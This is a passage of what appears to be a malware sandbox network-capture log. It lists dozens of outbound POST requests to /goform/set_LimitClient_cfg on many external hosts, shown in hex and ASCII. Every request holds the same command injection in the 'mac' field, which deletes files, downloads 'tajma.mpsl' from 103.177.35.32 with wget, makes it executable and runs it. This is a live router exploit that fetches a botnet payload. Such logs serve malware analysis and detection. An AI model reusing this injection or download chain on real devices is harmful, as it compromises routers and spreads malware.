                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        399192.168.2.235184639.140.17.2558080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.292507887 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        400192.168.2.235415883.239.122.2028080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.292534113 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        401192.168.2.236061273.75.34.1758080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.292558908 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        402192.168.2.235741082.44.204.1408080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.292588949 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        403192.168.2.2338266151.103.248.508080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.292617083 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        404192.168.2.235145093.94.173.1388080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.292629004 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        405192.168.2.234253827.84.46.1518080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.292656898 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        406192.168.2.23414984.117.188.1988080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.292687893 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        407192.168.2.234533489.79.22.248080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.292712927 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        408192.168.2.2341878187.224.161.2218080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.292740107 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        409192.168.2.2357384170.38.121.1498080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.292773962 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        410192.168.2.23352148.82.73.1658080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.292814016 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        411192.168.2.2359210177.248.170.2418080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.292841911 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        412192.168.2.2333202108.40.54.1208080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.292856932 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        413192.168.2.233923666.195.6.2178080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.292872906 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        414192.168.2.2340648158.155.171.1688080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.292893887 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        415192.168.2.2350188199.170.86.548080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.292917967 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        416192.168.2.2340112113.26.209.1828080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.292938948 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        417192.168.2.234275478.85.69.1418080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.292989969 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        418192.168.2.2351570134.102.217.928080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.293016911 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        419192.168.2.2354272178.86.10.568080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.293076038 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        420192.168.2.2351530173.119.46.208080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.293092966 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        421192.168.2.235133660.60.230.1398080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.293611050 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
